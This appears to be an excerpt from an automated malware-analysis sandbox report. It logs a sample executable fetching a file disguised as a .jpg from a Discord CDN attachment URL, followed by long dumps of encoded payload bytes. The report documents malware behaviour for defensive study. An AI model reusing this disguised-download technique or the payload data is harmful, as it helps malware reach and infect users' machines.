                    2021-10-26 16:59:38 UTC2710INData Raw: 20 31 34 39 20 32 33 30 20 31 37 35 20 31 36 33 20 30 20 32 33 36 20 31 38 30 20 31 39 30 20 32 33 36 20 31 38 30 20 31 36 35 20 32 33 36 20 31 38 30 20 31 39 30 20 32 33 36 20 31 38 30 20 31 36 32 20 32 33 36 20 31 38 30 20 31 36 34 20 32 33 36 20 31 38 31 20 31 34 35 20 32 33 36 20 31 38 31 20 31 34 35 20 32 33 36 20 31 38 30 20 31 36 33 20 32 33 36 20 31 38 30 20 31 36 37 20 32 33 36 20 31 38 31 20 31 36 35 20 32 33 36 20 31 38 30 20 31 38 30 20 32 33 36 20 31 38 30 20 31 36 32 20 32 33 36 20 31 38 30 20 31 38 38 20 32 33 36 20 31 38 31 20 31 34 34 20 32 33 36 20 31 38 31 20 31 36 33 20 30 20 32 32 35 20 31 38 32 20 31 38 36 20 32 32 35 20 31 38 32 20 31 37 34 20 32 32 35 20 31 38 31 20 31 38 39 20 32 32 35 20 31 38 32 20 31 35 38 20 32 32 35 20 31 38
                    Data Ascii: 149 230 175 163 0 236 180 190 236 180 165 236 180 190 236 180 162 236 180 164 236 181 145 236 181 145 236 180 163 236 180 167 236 181 165 236 180 180 236 180 162 236 180 188 236 181 144 236 181 163 0 225 182 186 225 182 174 225 181 189 225 182 158 225 18
                    2021-10-26 16:59:38 UTC2726INData Raw: 35 37 20 32 32 36 20 31 36 30 20 31 35 36 20 32 32 36 20 31 35 39 20 31 36 39 20 32 32 36 20 31 36 30 20 31 35 36 20 32 32 36 20 31 35 39 20 31 37 31 20 32 32 36 20 31 35 39 20 31 36 38 20 32 32 36 20 31 35 39 20 31 37 30 20 30 20 32 33 33 20 31 36 30 20 31 33 37 20 32 33 33 20 31 36 31 20 31 34 36 20 32 33 33 20 31 36 30 20 31 38 38 20 32 33 33 20 31 36 30 20 31 38 37 20 32 33 33 20 31 36 30 20 31 33 37 20 32 33 33 20 31 36 30 20 31 35 34 20 32 33 33 20 31 36 30 20 31 33 38 20 32 33 33 20 31 36 31 20 31 34 35 20 32 33 33 20 31 36 30 20 31 37 34 20 32 33 33 20 31 36 30 20 31 34 34 20 32 33 33 20 31 36 30 20 31 33 37 20 32 33 33 20 31 36 30 20 31 38 36 20 32 33 33 20 31 36 30 20 31 37 33 20 32 33 33 20 31 36 30 20 31 38 38 20 32 33 33 20 31 36 30 20 31 37
                    Data Ascii: 57 226 160 156 226 159 169 226 160 156 226 159 171 226 159 168 226 159 170 0 233 160 137 233 161 146 233 160 188 233 160 187 233 160 137 233 160 154 233 160 138 233 161 145 233 160 174 233 160 144 233 160 137 233 160 186 233 160 173 233 160 188 233 160 17


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    3192.168.2.349695162.159.129.233443C:\Users\user\Desktop\p9Ts9VV2NZ.exe
                    TimestampkBytes transferredDirectionData
                    2021-10-26 16:59:38 UTC2740OUTGET /attachments/893177342426509335/897185987367678032/09E84BB7.jpg HTTP/1.1
                    Host: cdn.discordapp.com
                    2021-10-26 16:59:38 UTC2740INHTTP/1.1 200 OK
                    Date: Tue, 26 Oct 2021 16:59:38 GMT
                    Content-Type: image/jpeg
                    Content-Length: 754681
                    Connection: close
                    CF-Ray: 6a453c804bee3237-FRA
                    Accept-Ranges: bytes
                    Age: 1049
                    Cache-Control: public, max-age=31536000
                    ETag: "67627ddafc6ba2588faf0c788dec6e85"
                    Expires: Wed, 26 Oct 2022 16:59:38 GMT
                    Last-Modified: Mon, 11 Oct 2021 18:16:48 GMT
                    Vary: Accept-Encoding
                    CF-Cache-Status: HIT
                    Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                    Cf-Bgj: h2pri
                    Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                    x-goog-generation: 1633976208346288
                    x-goog-hash: crc32c=75c5bQ==
                    x-goog-hash: md5=Z2J92vxroliPrwx4jexuhQ==
                    x-goog-metageneration: 1
                    x-goog-storage-class: STANDARD
                    x-goog-stored-content-encoding: identity
                    x-goog-stored-content-length: 754681
                    X-GUploader-UploadID: ADPycdvoLYZ1NnA4WezzLEAzmJeNwJypM6fQ7yCecEsDt16F8bBFv5AcwUjNmUn-Eji2KLbxk0rJIeeBQxG8hUHphfQ
                    X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=apB7bVbDurVddhl3%2F42%2B1fYEkN32F4y%2BOW7IFAbeozS2sSriYkS%2Fc0gkyOQYpUP1nVo0q%2BjX4VkEqCBTU882nzlZI0Q03nmBAILpzJ%2FQK0fc%2BvMKtkw1eUM4rukfr5Gpp6RaEA%3D%3D"}],"group":"cf-nel","max_age":604800}
                    2021-10-26 16:59:38 UTC2741INData Raw: 4e 45 4c 3a 20 7b 22 73 75 63 63 65 73 73 5f 66 72 61 63 74 69 6f 6e 22 3a 30 2c 22 72 65 70 6f 72 74 5f 74 6f 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a 36 30 34 38 30 30 7d 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 0d 0a
                    Data Ascii: NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflare
                    2021-10-26 16:59:38 UTC2741INData Raw: 20 31 33 35 20 31 34 32 20 32 32 38 20 31 33 34 20 31 37 33 20 32 32 38 20 31 33 34 20 31 37 32 20 32 32 38 20 31 33 35 20 31 33 32 20 32 32 38 20 31 33 35 20 31 38 30 20 32 32 38 20 31 33 35 20 31 33 30 20 32 32 38 20 31 33 35 20 31 36 37 20 32 32 38 20 31 33 34 20 31 37 37 20 32 32 38 20 31 33 35 20 31 37 31 20 32 32 38 20 31 33 35 20 31 35 38 20 32 32 38 20 31 33 34 20 31 37 34 20 32 32 38 20 31 33 34 20 31 37 38 20 30 20 32 32 38 20 31 34 31 20 31 33 33 20 32 32 38 20 31 34 31 20 31 38 32 20 32 32 38 20 31 34 31 20 31 33 37 20 32 32 38 20 31 34 32 20 31 33 33 20 32 32 38 20 31 34 31 20 31 38 35 20 32 32 38 20 31 34 31 20 31 36 33 20 32 32 38 20 31 34 31 20 31 33 32 20 32 32 38 20 31 34 31 20 31 34 37 20 32 32 38 20 31 34 31 20 31 38 30 20 32 32 38 20
                    Data Ascii: 135 142 228 134 173 228 134 172 228 135 132 228 135 180 228 135 130 228 135 167 228 134 177 228 135 171 228 135 158 228 134 174 228 134 178 0 228 141 133 228 141 182 228 141 137 228 142 133 228 141 185 228 141 163 228 141 132 228 141 147 228 141 180 228
                    2021-10-26 16:59:38 UTC2743INData Raw: 31 36 30 20 31 35 33 20 32 33 36 20 31 36 31 20 31 33 37 20 32 33 36 20 31 36 31 20 31 33 36 20 32 33 36 20 31 36 30 20 31 35 39 20 32 33 36 20 31 36 30 20 31 38 34 20 32 33 36 20 31 36 31 20 31 35 38 20 32 33 36 20 31 36 31 20 31 35 37 20 32 33 36 20 31 36 30 20 31 37 38 20 30 20 32 33 38 20 31 36 37 20 31 37 37 20 32 33 38 20 31 36 38 20 31 35 37 20 32 33 38 20 31 36 38 20 31 37 38 20 32 33 38 20 31 36 37 20 31 37 39 20 32 33 38 20 31 36 38 20 31 34 30 20 32 33 38 20 31 36 38 20 31 36 36 20 32 33 38 20 31 36 37 20 31 37 39 20 32 33 38 20 31 36 37 20 31 37 34 20 32 33 38 20 31 36 37 20 31 38 30 20 32 33 38 20 31 36 38 20 31 35 38 20 32 33 38 20 31 36 38 20 31 38 30 20 32 33 38 20 31 36 37 20 31 37 34 20 32 33 38 20 31 36 37 20 31 37 32 20 32 33 38 20 31
                    Data Ascii: 160 153 236 161 137 236 161 136 236 160 159 236 160 184 236 161 158 236 161 157 236 160 178 0 238 167 177 238 168 157 238 168 178 238 167 179 238 168 140 238 168 166 238 167 179 238 167 174 238 167 180 238 168 158 238 168 180 238 167 174 238 167 172 238 1
                    2021-10-26 16:59:38 UTC2744INData Raw: 32 34 20 31 36 35 20 31 35 36 20 32 32 34 20 31 36 35 20 31 36 37 20 32 32 34 20 31 36 35 20 31 32 38 20 32 32 34 20 31 36 35 20 31 38 39 20 32 32 34 20 31 36 35 20 31 32 39 20 32 32 34 20 31 36 35 20 31 32 38 20 32 32 34 20 31 36 35 20 31 37 39 20 32 32 34 20 31 36 35 20 31 34 35 20 32 32 34 20 31 36 35 20 31 36 33 20 32 32 34 20 31 36 35 20 31 37 37 20 32 32 34 20 31 36 35 20 31 35 35 20 32 32 34 20 31 36 35 20 31 33 31 20 32 32 34 20 31 36 35 20 31 38 30 20 32 32 34 20 31 36 35 20 31 33 33 20 32 32 34 20 31 36 35 20 31 37 39 20 30 20 32 33 38 20 31 38 37 20 31 36 33 20 32 33 38 20 31 38 36 20 31 37 35 20 32 33 38 20 31 38 37 20 31 36 32 20 32 33 38 20 31 38 37 20 31 36 31 20 32 33 38 20 31 38 36 20 31 38 32 20 32 33 38 20 31 38 36 20 31 37 37 20 32 33
                    Data Ascii: 24 165 156 224 165 167 224 165 128 224 165 189 224 165 129 224 165 128 224 165 179 224 165 145 224 165 163 224 165 177 224 165 155 224 165 131 224 165 180 224 165 133 224 165 179 0 238 187 163 238 186 175 238 187 162 238 187 161 238 186 182 238 186 177 23
                    2021-10-26 16:59:38 UTC2745INData Raw: 32 33 39 20 31 37 34 20 31 37 31 20 32 33 39 20 31 37 34 20 31 33 33 20 32 33 39 20 31 37 33 20 31 38 30 20 32 33 39 20 31 37 34 20 31 37 35 20 32 33 39 20 31 37 33 20 31 38 35 20 32 33 39 20 31 37 34 20 31 38 34 20 32 33 39 20 31 37 33 20 31 38 30 20 30 20 32 33 34 20 31 38 35 20 31 37 39 20 32 33 34 20 31 38 35 20 31 38 30 20 32 33 34 20 31 38 35 20 31 37 39 20 32 33 34 20 31 38 35 20 31 33 33 20 32 33 34 20 31 38 35 20 31 36 34 20 32 33 34 20 31 38 35 20 31 35 31 20 32 33 34 20 31 38 35 20 31 35 30 20 32 33 34 20 31 38 35 20 31 36 38 20 32 33 34 20 31 38 35 20 31 33 33 20 32 33 34 20 31 38 35 20 31 38 32 20 32 33 34 20 31 38 35 20 31 32 38 20 32 33 34 20 31 38 35 20 31 33 36 20 32 33 34 20 31 38 35 20 31 32 38 20 32 33 34 20 31 38 36 20 31 33 37 20 32
                    Data Ascii: 239 174 171 239 174 133 239 173 180 239 174 175 239 173 185 239 174 184 239 173 180 0 234 185 179 234 185 180 234 185 179 234 185 133 234 185 164 234 185 151 234 185 150 234 185 168 234 185 133 234 185 182 234 185 128 234 185 136 234 185 128 234 186 137 2
                    2021-10-26 16:59:38 UTC2747INData Raw: 37 34 20 32 33 32 20 31 35 31 20 31 36 30 20 32 33 32 20 31 35 30 20 31 38 31 20 32 33 32 20 31 35 30 20 31 37 38 20 32 33 32 20 31 35 31 20 31 32 38 20 32 33 32 20 31 35 30 20 31 37 39 20 32 33 32 20 31 35 30 20 31 38 30 20 32 33 32 20 31 35 30 20 31 37 35 20 32 33 32 20 31 35 30 20 31 37 37 20 32 33 32 20 31 35 31 20 31 38 31 20 30 20 32 33 33 20 31 35 33 20 31 33 30 20 32 33 33 20 31 35 32 20 31 38 35 20 32 33 33 20 31 35 32 20 31 35 34 20 32 33 33 20 31 35 32 20 31 35 38 20 32 33 33 20 31 35 32 20 31 35 34 20 32 33 33 20 31 35 32 20 31 33 39 20 32 33 33 20 31 35 32 20 31 38 33 20 32 33 33 20 31 35 32 20 31 33 36 20 32 33 33 20 31 35 32 20 31 38 33 20 32 33 33 20 31 35 32 20 31 38 33 20 32 33 33 20 31 35 32 20 31 33 33 20 32 33 33 20 31 35 32 20 31 33
                    Data Ascii: 74 232 151 160 232 150 181 232 150 178 232 151 128 232 150 179 232 150 180 232 150 175 232 150 177 232 151 181 0 233 153 130 233 152 185 233 152 154 233 152 158 233 152 154 233 152 139 233 152 183 233 152 136 233 152 183 233 152 183 233 152 133 233 152 13
                    2021-10-26 16:59:38 UTC2748INData Raw: 31 34 34 20 32 33 33 20 31 37 33 20 31 38 31 20 30 20 32 33 33 20 31 37 37 20 31 33 30 20 32 33 33 20 31 37 37 20 31 34 36 20 32 33 33 20 31 37 37 20 31 33 33 20 32 33 33 20 31 37 37 20 31 38 31 20 32 33 33 20 31 37 37 20 31 33 37 20 32 33 33 20 31 37 37 20 31 33 34 20 32 33 33 20 31 37 37 20 31 35 37 20 32 33 33 20 31 37 37 20 31 36 36 20 32 33 33 20 31 37 37 20 31 33 30 20 32 33 33 20 31 37 37 20 31 37 39 20 32 33 33 20 31 37 38 20 31 32 39 20 32 33 33 20 31 37 37 20 31 33 33 20 32 33 33 20 31 37 37 20 31 33 37 20 32 33 33 20 31 37 37 20 31 33 33 20 32 33 33 20 31 37 37 20 31 38 31 20 30 20 32 33 33 20 31 38 32 20 31 33 39 20 32 33 33 20 31 38 32 20 31 38 35 20 32 33 33 20 31 38 32 20 31 33 39 20 32 33 33 20 31 38 32 20 31 36 33 20 32 33 33 20 31 38 32
                    Data Ascii: 144 233 173 181 0 233 177 130 233 177 146 233 177 133 233 177 181 233 177 137 233 177 134 233 177 157 233 177 166 233 177 130 233 177 179 233 178 129 233 177 133 233 177 137 233 177 133 233 177 181 0 233 182 139 233 182 185 233 182 139 233 182 163 233 182
                    2021-10-26 16:59:38 UTC2749INData Raw: 33 37 20 31 33 36 20 32 32 36 20 31 33 37 20 31 33 36 20 32 32 36 20 31 33 37 20 31 38 32 20 32 32 36 20 31 33 37 20 31 33 34 20 32 32 36 20 31 33 37 20 31 33 31 20 32 32 36 20 31 33 37 20 31 33 32 20 32 32 36 20 31 33 37 20 31 33 31 20 32 32 36 20 31 33 37 20 31 33 36 20 32 32 36 20 31 33 37 20 31 38 32 20 30 20 32 33 30 20 31 34 31 20 31 36 34 20 32 33 30 20 31 34 30 20 31 38 32 20 32 33 30 20 31 34 30 20 31 38 32 20 32 33 30 20 31 34 30 20 31 37 38 20 32 33 30 20 31 34 31 20 31 34 37 20 32 33 30 20 31 34 31 20 31 35 30 20 32 33 30 20 31 34 30 20 31 37 38 20 32 33 30 20 31 34 30 20 31 37 37 20 32 33 30 20 31 34 30 20 31 37 35 20 32 33 30 20 31 34 30 20 31 37 38 20 32 33 30 20 31 34 31 20 31 33 30 20 32 33 30 20 31 34 30 20 31 37 37 20 32 33 30 20 31 34
                    Data Ascii: 37 136 226 137 136 226 137 182 226 137 134 226 137 131 226 137 132 226 137 131 226 137 136 226 137 182 0 230 141 164 230 140 182 230 140 182 230 140 178 230 141 147 230 141 150 230 140 178 230 140 177 230 140 175 230 140 178 230 141 130 230 140 177 230 14
                    2021-10-26 16:59:38 UTC2751INData Raw: 31 37 30 20 31 38 32 20 30 20 32 32 38 20 31 37 34 20 31 36 31 20 32 32 38 20 31 37 34 20 31 33 34 20 32 32 38 20 31 37 34 20 31 33 36 20 32 32 38 20 31 37 34 20 31 37 35 20 32 32 38 20 31 37 33 20 31 37 35 20 32 32 38 20 31 37 33 20 31 37 37 20 32 32 38 20 31 37 34 20 31 34 34 20 32 32 38 20 31 37 33 20 31 38 32 20 32 32 38 20 31 37 33 20 31 38 33 20 32 32 38 20 31 37 33 20 31 38 32 20 32 32 38 20 31 37 33 20 31 37 37 20 32 32 38 20 31 37 34 20 31 36 34 20 32 32 38 20 31 37 34 20 31 37 36 20 32 32 38 20 31 37 33 20 31 38 30 20 32 32 38 20 31 37 33 20 31 38 32 20 30 20 32 33 33 20 31 37 34 20 31 36 34 20 32 33 33 20 31 37 33 20 31 37 39 20 32 33 33 20 31 37 33 20 31 38 32 20 32 33 33 20 31 37 33 20 31 38 32 20 32 33 33 20 31 37 34 20 31 33 34 20 32 33 33
                    Data Ascii: 170 182 0 228 174 161 228 174 134 228 174 136 228 174 175 228 173 175 228 173 177 228 174 144 228 173 182 228 173 183 228 173 182 228 173 177 228 174 164 228 174 176 228 173 180 228 173 182 0 233 174 164 233 173 179 233 173 182 233 173 182 233 174 134 233
                    2021-10-26 16:59:38 UTC2752INData Raw: 33 39 20 31 38 38 20 31 38 31 20 32 33 39 20 31 38 37 20 31 38 33 20 32 33 39 20 31 38 38 20 31 39 31 20 32 33 39 20 31 38 38 20 31 37 31 20 32 33 39 20 31 38 37 20 31 39 31 20 32 33 39 20 31 38 37 20 31 38 35 20 32 33 39 20 31 38 38 20 31 39 30 20 32 33 39 20 31 38 37 20 31 38 32 20 30 20 32 32 39 20 31 32 39 20 31 34 32 20 32 32 39 20 31 32 39 20 31 35 32 20 32 32 39 20 31 32 39 20 31 33 39 20 32 32 39 20 31 32 39 20 31 36 31 20 32 32 39 20 31 33 30 20 31 34 30 20 32 32 39 20 31 32 39 20 31 33 37 20 32 32 39 20 31 32 39 20 31 33 38 20 32 32 39 20 31 32 39 20 31 38 37 20 32 32 39 20 31 32 39 20 31 38 35 20 32 32 39 20 31 32 39 20 31 34 31 20 32 32 39 20 31 32 39 20 31 33 33 20 32 32 39 20 31 32 39 20 31 37 32 20 32 32 39 20 31 32 39 20 31 38 32 20 32 32
                    Data Ascii: 39 188 181 239 187 183 239 188 191 239 188 171 239 187 191 239 187 185 239 188 190 239 187 182 0 229 129 142 229 129 152 229 129 139 229 129 161 229 130 140 229 129 137 229 129 138 229 129 187 229 129 185 229 129 141 229 129 133 229 129 172 229 129 182 22
                    2021-10-26 16:59:38 UTC2753INData Raw: 30 20 32 32 34 20 31 37 30 20 31 33 34 20 32 32 34 20 31 37 30 20 31 36 36 20 32 32 34 20 31 36 39 20 31 38 30 20 32 32 34 20 31 36 39 20 31 38 31 20 32 32 34 20 31 36 39 20 31 38 32 20 32 32 34 20 31 37 30 20 31 36 39 20 32 32 34 20 31 37 30 20 31 37 38 20 32 32 34 20 31 36 39 20 31 38 33 20 32 32 34 20 31 37 30 20 31 36 35 20 32 32 34 20 31 37 30 20 31 35 34 20 32 32 34 20 31 37 30 20 31 35 32 20 32 32 34 20 31 36 39 20 31 38 33 20 32 32 34 20 31 36 39 20 31 38 30 20 32 32 34 20 31 36 39 20 31 38 31 20 32 32 34 20 31 36 39 20 31 38 33 20 30 20 32 33 36 20 31 36 39 20 31 35 31 20 32 33 36 20 31 36 39 20 31 36 37 20 32 33 36 20 31 37 30 20 31 33 31 20 32 33 36 20 31 36 39 20 31 34 34 20 32 33 36 20 31 37 30 20 31 32 39 20 32 33 36 20 31 36 39 20 31 37 32
                    Data Ascii: 0 224 170 134 224 170 166 224 169 180 224 169 181 224 169 182 224 170 169 224 170 178 224 169 183 224 170 165 224 170 154 224 170 152 224 169 183 224 169 180 224 169 181 224 169 183 0 236 169 151 236 169 167 236 170 131 236 169 144 236 170 129 236 169 172
                    2021-10-26 16:59:38 UTC2755INData Raw: 33 32 20 32 33 31 20 31 34 33 20 31 33 31 20 32 33 31 20 31 34 33 20 31 38 34 20 30 20 32 33 32 20 31 34 35 20 31 33 31 20 32 33 32 20 31 34 34 20 31 33 36 20 32 33 32 20 31 34 34 20 31 38 34 20 32 33 32 20 31 34 34 20 31 38 36 20 32 33 32 20 31 34 34 20 31 37 33 20 32 33 32 20 31 34 34 20 31 33 38 20 32 33 32 20 31 34 34 20 31 38 36 20 32 33 32 20 31 34 34 20 31 34 31 20 32 33 32 20 31 34 35 20 31 33 33 20 32 33 32 20 31 34 34 20 31 38 35 20 32 33 32 20 31 34 34 20 31 33 36 20 32 33 32 20 31 34 34 20 31 38 33 20 32 33 32 20 31 34 34 20 31 33 34 20 32 33 32 20 31 34 34 20 31 38 33 20 32 33 32 20 31 34 34 20 31 38 34 20 30 20 32 32 36 20 31 35 30 20 31 39 31 20 32 32 36 20 31 35 30 20 31 39 31 20 32 32 36 20 31 35 30 20 31 38 37 20 32 32 36 20 31 35 31 20
                    Data Ascii: 32 231 143 131 231 143 184 0 232 145 131 232 144 136 232 144 184 232 144 186 232 144 173 232 144 138 232 144 186 232 144 141 232 145 133 232 144 185 232 144 136 232 144 183 232 144 134 232 144 183 232 144 184 0 226 150 191 226 150 191 226 150 187 226 151
                    2021-10-26 16:59:38 UTC2756INData Raw: 35 20 31 33 32 20 32 32 34 20 31 37 35 20 31 34 36 20 32 32 34 20 31 37 35 20 31 37 38 20 32 32 34 20 31 37 35 20 31 37 38 20 32 32 34 20 31 37 36 20 31 33 34 20 32 32 34 20 31 37 36 20 31 33 38 20 32 32 34 20 31 37 35 20 31 33 32 20 32 32 34 20 31 37 35 20 31 38 33 20 32 32 34 20 31 37 36 20 31 33 32 20 32 32 34 20 31 37 35 20 31 38 34 20 30 20 32 33 36 20 31 37 38 20 31 38 33 20 32 33 36 20 31 37 37 20 31 38 30 20 32 33 36 20 31 37 38 20 31 36 39 20 32 33 36 20 31 37 38 20 31 34 35 20 32 33 36 20 31 37 38 20 31 34 38 20 32 33 36 20 31 37 38 20 31 36 36 20 32 33 36 20 31 37 37 20 31 38 35 20 32 33 36 20 31 37 37 20 31 38 38 20 32 33 36 20 31 37 38 20 31 37 32 20 32 33 36 20 31 37 37 20 31 38 36 20 32 33 36 20 31 37 37 20 31 38 34 20 32 33 36 20 31 37 37
                    Data Ascii: 5 132 224 175 146 224 175 178 224 175 178 224 176 134 224 176 138 224 175 132 224 175 183 224 176 132 224 175 184 0 236 178 183 236 177 180 236 178 169 236 178 145 236 178 148 236 178 166 236 177 185 236 177 188 236 178 172 236 177 186 236 177 184 236 177
                    2021-10-26 16:59:38 UTC2757INData Raw: 35 32 20 31 32 38 20 32 33 36 20 31 35 31 20 31 38 35 20 30 20 32 33 32 20 31 35 35 20 31 35 34 20 32 33 32 20 31 35 35 20 31 37 31 20 32 33 32 20 31 35 34 20 31 38 33 20 32 33 32 20 31 35 35 20 31 39 31 20 32 33 32 20 31 35 35 20 31 37 36 20 32 33 32 20 31 35 35 20 31 37 33 20 32 33 32 20 31 35 35 20 31 36 31 20 32 33 32 20 31 35 34 20 31 38 38 20 32 33 32 20 31 35 35 20 31 34 32 20 32 33 32 20 31 35 34 20 31 39 30 20 32 33 32 20 31 35 35 20 31 36 38 20 32 33 32 20 31 35 35 20 31 36 38 20 32 33 32 20 31 35 35 20 31 34 32 20 32 33 32 20 31 35 35 20 31 36 39 20 32 33 32 20 31 35 34 20 31 38 35 20 30 20 32 32 34 20 31 36 39 20 31 33 36 20 32 32 34 20 31 36 39 20 31 33 31 20 32 32 34 20 31 36 39 20 31 33 33 20 32 32 34 20 31 36 39 20 31 38 31 20 32 32 34 20
                    Data Ascii: 52 128 236 151 185 0 232 155 154 232 155 171 232 154 183 232 155 191 232 155 176 232 155 173 232 155 161 232 154 188 232 155 142 232 154 190 232 155 168 232 155 168 232 155 142 232 155 169 232 154 185 0 224 169 136 224 169 131 224 169 133 224 169 181 224
                    2021-10-26 16:59:38 UTC2759INData Raw: 33 20 31 38 38 20 31 33 37 20 32 33 33 20 31 38 38 20 31 35 39 20 32 33 33 20 31 38 38 20 31 38 38 20 32 33 33 20 31 38 38 20 31 35 36 20 32 33 33 20 31 38 38 20 31 34 34 20 32 33 33 20 31 38 38 20 31 37 31 20 32 33 33 20 31 38 38 20 31 33 36 20 32 33 33 20 31 38 39 20 31 32 39 20 32 33 33 20 31 38 38 20 31 38 35 20 30 20 32 32 35 20 31 32 39 20 31 33 33 20 32 32 35 20 31 32 39 20 31 33 39 20 32 32 35 20 31 32 39 20 31 37 33 20 32 32 35 20 31 32 39 20 31 36 34 20 32 32 35 20 31 32 39 20 31 33 35 20 32 32 35 20 31 32 39 20 31 38 33 20 32 32 35 20 31 32 39 20 31 36 33 20 32 32 35 20 31 32 39 20 31 38 31 20 32 32 35 20 31 32 39 20 31 39 31 20 32 32 35 20 31 32 39 20 31 38 36 20 32 32 35 20 31 32 39 20 31 33 32 20 32 32 35 20 31 32 39 20 31 33 37 20 32 32 35
                    Data Ascii: 3 188 137 233 188 159 233 188 188 233 188 156 233 188 144 233 188 171 233 188 136 233 189 129 233 188 185 0 225 129 133 225 129 139 225 129 173 225 129 164 225 129 135 225 129 183 225 129 163 225 129 181 225 129 191 225 129 186 225 129 132 225 129 137 225
                    2021-10-26 16:59:38 UTC2760INData Raw: 33 33 20 31 34 34 20 31 38 36 20 30 20 32 33 32 20 31 35 33 20 31 36 39 20 32 33 32 20 31 35 33 20 31 37 30 20 32 33 32 20 31 35 32 20 31 38 36 20 32 33 32 20 31 35 33 20 31 36 37 20 32 33 32 20 31 35 33 20 31 34 38 20 32 33 32 20 31 35 32 20 31 39 30 20 32 33 32 20 31 35 33 20 31 35 33 20 32 33 32 20 31 35 32 20 31 38 36 20 32 33 32 20 31 35 33 20 31 37 39 20 32 33 32 20 31 35 32 20 31 38 35 20 32 33 32 20 31 35 33 20 31 36 37 20 32 33 32 20 31 35 33 20 31 37 31 20 32 33 32 20 31 35 32 20 31 38 35 20 32 33 32 20 31 35 33 20 31 38 37 20 32 33 32 20 31 35 32 20 31 38 36 20 30 20 32 33 39 20 31 35 35 20 31 37 30 20 32 33 39 20 31 35 36 20 31 32 39 20 32 33 39 20 31 35 35 20 31 36 32 20 32 33 39 20 31 35 35 20 31 37 34 20 32 33 39 20 31 35 34 20 31 38 39 20
                    Data Ascii: 33 144 186 0 232 153 169 232 153 170 232 152 186 232 153 167 232 153 148 232 152 190 232 153 153 232 152 186 232 153 179 232 152 185 232 153 167 232 153 171 232 152 185 232 153 187 232 152 186 0 239 155 170 239 156 129 239 155 162 239 155 174 239 154 189
                    2021-10-26 16:59:38 UTC2761INData Raw: 30 20 32 32 39 20 31 32 39 20 31 37 30 20 32 32 39 20 31 32 38 20 31 38 32 20 32 32 39 20 31 32 38 20 31 38 38 20 32 32 39 20 31 32 39 20 31 34 34 20 32 32 39 20 31 32 39 20 31 35 35 20 32 32 39 20 31 32 39 20 31 37 38 20 32 32 39 20 31 32 39 20 31 36 37 20 32 32 39 20 31 32 38 20 31 38 37 20 30 20 32 33 39 20 31 33 32 20 31 39 30 20 32 33 39 20 31 33 32 20 31 36 35 20 32 33 39 20 31 33 32 20 31 34 31 20 32 33 39 20 31 33 32 20 31 38 38 20 32 33 39 20 31 33 32 20 31 38 38 20 32 33 39 20 31 33 32 20 31 34 36 20 32 33 39 20 31 33 33 20 31 32 38 20 32 33 39 20 31 33 32 20 31 38 39 20 32 33 39 20 31 33 32 20 31 34 36 20 32 33 39 20 31 33 33 20 31 34 32 20 32 33 39 20 31 33 32 20 31 39 30 20 32 33 39 20 31 33 32 20 31 39 30 20 32 33 39 20 31 33 32 20 31 34 32
                    Data Ascii: 0 229 129 170 229 128 182 229 128 188 229 129 144 229 129 155 229 129 178 229 129 167 229 128 187 0 239 132 190 239 132 165 239 132 141 239 132 188 239 132 188 239 132 146 239 133 128 239 132 189 239 132 146 239 133 142 239 132 190 239 132 190 239 132 142
                    2021-10-26 16:59:38 UTC2763INData Raw: 38 37 20 30 20 32 33 30 20 31 35 31 20 31 37 36 20 32 33 30 20 31 35 31 20 31 34 32 20 32 33 30 20 31 35 31 20 31 34 30 20 32 33 30 20 31 35 31 20 31 34 33 20 32 33 30 20 31 35 31 20 31 35 33 20 32 33 30 20 31 35 31 20 31 38 39 20 32 33 30 20 31 35 31 20 31 34 32 20 32 33 30 20 31 35 31 20 31 38 36 20 32 33 30 20 31 35 31 20 31 38 39 20 32 33 30 20 31 35 31 20 31 36 33 20 32 33 30 20 31 35 31 20 31 37 34 20 32 33 30 20 31 35 31 20 31 34 30 20 32 33 30 20 31 35 31 20 31 34 30 20 32 33 30 20 31 35 31 20 31 33 39 20 32 33 30 20 31 35 31 20 31 38 37 20 30 20 32 33 36 20 31 35 33 20 31 36 35 20 32 33 36 20 31 35 32 20 31 37 37 20 32 33 36 20 31 35 33 20 31 37 32 20 32 33 36 20 31 35 33 20 31 33 37 20 32 33 36 20 31 35 32 20 31 37 38 20 32 33 36 20 31 35 33 20
                    Data Ascii: 87 0 230 151 176 230 151 142 230 151 140 230 151 143 230 151 153 230 151 189 230 151 142 230 151 186 230 151 189 230 151 163 230 151 174 230 151 140 230 151 140 230 151 139 230 151 187 0 236 153 165 236 152 177 236 153 172 236 153 137 236 152 178 236 153
                    2021-10-26 16:59:38 UTC2764INData Raw: 30 20 31 34 37 20 32 33 31 20 31 33 39 20 31 38 34 20 32 33 31 20 31 33 39 20 31 39 30 20 32 33 31 20 31 34 30 20 31 32 38 20 32 33 31 20 31 33 39 20 31 39 30 20 32 33 31 20 31 33 39 20 31 38 33 20 32 33 31 20 31 34 30 20 31 36 30 20 32 33 31 20 31 34 30 20 31 38 38 20 30 20 32 32 37 20 31 34 32 20 31 36 38 20 32 32 37 20 31 34 31 20 31 38 34 20 32 32 37 20 31 34 32 20 31 37 35 20 32 32 37 20 31 34 31 20 31 38 30 20 32 32 37 20 31 34 32 20 31 36 36 20 32 32 37 20 31 34 31 20 31 38 30 20 32 32 37 20 31 34 32 20 31 34 39 20 32 32 37 20 31 34 31 20 31 38 36 20 32 32 37 20 31 34 32 20 31 35 30 20 32 32 37 20 31 34 31 20 31 38 38 20 32 32 37 20 31 34 31 20 31 38 37 20 32 32 37 20 31 34 31 20 31 38 33 20 32 32 37 20 31 34 32 20 31 33 35 20 32 32 37 20 31 34 31
                    Data Ascii: 0 147 231 139 184 231 139 190 231 140 128 231 139 190 231 139 183 231 140 160 231 140 188 0 227 142 168 227 141 184 227 142 175 227 141 180 227 142 166 227 141 180 227 142 149 227 141 186 227 142 150 227 141 188 227 141 187 227 141 183 227 142 135 227 141
